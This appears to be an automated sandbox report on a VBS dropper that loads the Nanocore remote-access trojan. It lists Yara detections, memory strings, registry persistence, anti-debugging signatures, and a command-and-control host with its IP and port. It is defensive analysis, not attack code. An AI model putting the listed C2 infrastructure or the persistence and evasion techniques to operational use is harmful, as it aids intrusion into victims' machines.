Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_089EAD24 CreateNamedPipeW, 10_2_089EAD24

Stealing of Sensitive Information
barindex
Yara detected Nanocore RAT
Source: Yara match File source: 37.2.CasPol.exe.1f1eeadc.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.CasPol.exe.1f19eadc.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.CasPol.exe.1f1a3105.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.CasPol.exe.1f1f3105.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.CasPol.exe.1f19eadc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.CasPol.exe.1f1e9ca6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.CasPol.exe.1f199ca6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.CasPol.exe.1f1eeadc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000022.00000002.268467219270.000000001E151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.268467630247.000000001F151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.268476945395.000000001E1A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.268477360466.000000001F1A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 3064, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 7664, type: MEMORYSTR

Remote Access Functionality
barindex
Detected Nanocore Rat
Source: CasPol.exe, 00000022.00000002.268467219270.000000001E151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: CasPol.exe, 00000022.00000002.268467219270.000000001E151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: CasPol.exe, 00000022.00000002.268467630247.000000001F151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: CasPol.exe, 00000022.00000002.268467630247.000000001F151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: CasPol.exe, 00000025.00000002.268476945395.000000001E1A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: CasPol.exe, 00000025.00000002.268476945395.000000001E1A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: CasPol.exe, 00000025.00000002.268477360466.000000001F1A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: CasPol.exe, 00000025.00000002.268477360466.000000001F1A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Yara detected Nanocore RAT
Source: Yara match File source: 37.2.CasPol.exe.1f1eeadc.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.CasPol.exe.1f19eadc.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.CasPol.exe.1f1a3105.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.CasPol.exe.1f1f3105.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.CasPol.exe.1f19eadc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.CasPol.exe.1f1e9ca6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.CasPol.exe.1f199ca6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.CasPol.exe.1f1eeadc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000022.00000002.268467219270.000000001E151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.268467630247.000000001F151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.268476945395.000000001E1A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.268477360466.000000001F1A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 3064, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 7664, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562140 Sample: IMG 0045434.vbs Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 77 onedrive.live.com 2->77 79 kadnjg.bn.files.1drv.com 2->79 81 bn-files.fe.1drv.com 2->81 93 Found malware configuration 2->93 95 Malicious sample detected (through community Yara rule) 2->95 97 Antivirus detection for URL or domain 2->97 99 9 other signatures 2->99 10 wscript.exe 2 2->10         started        13 cmd.exe 2->13         started        15 cmd.exe 2->15         started        17 2 other processes 2->17 signatures3 process4 signatures5 121 Wscript starts Powershell (via cmd or directly) 10->121 123 Very long command line found 10->123 125 Encrypted powershell cmdline option found 10->125 19 powershell.exe 24 10->19         started        127 Suspicious powershell command line found 13->127 22 powershell.exe 13->22         started        24 conhost.exe 13->24         started        26 powershell.exe 15->26         started        28 conhost.exe 15->28         started        30 conhost.exe 17->30         started        32 conhost.exe 17->32         started        process6 signatures7 101 Suspicious powershell command line found 19->101 103 Very long command line found 19->103 105 Encrypted powershell cmdline option found 19->105 107 2 other signatures 19->107 34 CasPol.exe 3 17 19->34         started        39 csc.exe 3 19->39         started        41 conhost.exe 19->41         started        43 powershell.exe 22->43         started        45 powershell.exe 26->45         started        process8 dnsIp9 83 tochukwu1122.ddns.net 185.140.53.143, 1122, 49811, 49818 DAVID_CRAIGGG Sweden 34->83 85 127.0.0.1 unknown unknown 34->85 67 C:\Users\user\AppData\Roaming\...\run.dat, ISO-8859 34->67 dropped 69 C:\Users\user\AppData\Roaming\...\dslmon.exe, PE32 34->69 dropped 109 Creates autostart registry keys with suspicious values (likely registry only malware) 34->109 111 Creates multiple autostart registry keys 34->111 113 Creates an autostart registry key pointing to binary in C:\Windows 34->113 115 Hides that the sample has been downloaded from the Internet (zone.identifier) 34->115 71 C:\Users\user\AppData\Local\...\kxeayl3s.dll, PE32 39->71 dropped 47 cvtres.exe 1 39->47         started        117 Tries to detect Any.run 43->117 119 Hides threads from debuggers 43->119 49 CasPol.exe 43->49         started        52 csc.exe 43->52         started        55 CasPol.exe 43->55         started        61 2 other processes 43->61 87 192.168.11.1 unknown unknown 45->87 57 CasPol.exe 45->57         started        59 csc.exe 45->59         started        file10 signatures11 process12 file13 73 C:\Users\user\AppData\Local\...\3rumnuxb.dll, PE32 52->73 dropped 63 cvtres.exe 52->63         started        89 Tries to detect Any.run 57->89 91 Hides threads from debuggers 57->91 75 C:\Users\user\AppData\Local\...\kar5iszo.dll, PE32 59->75 dropped 65 cvtres.exe 59->65         started        signatures14 process15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.140.53.143
 tochukwu1122.ddns.net Sweden
209623 DAVID_CRAIGGG true

Private

IP
192.168.11.1
127.0.0.1

Contacted Domains

Name IP Active
tochukwu1122.ddns.net 185.140.53.143 true
onedrive.live.com unknown unknown
kadnjg.bn.files.1drv.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://onedrive.live.com/download?cidO false
    		high
    tochukwu1122.ddns.net true
    • Avira URL Cloud: safe
    		 unknown
    127.0.0.1 true
    • Avira URL Cloud: safe
    		 unknown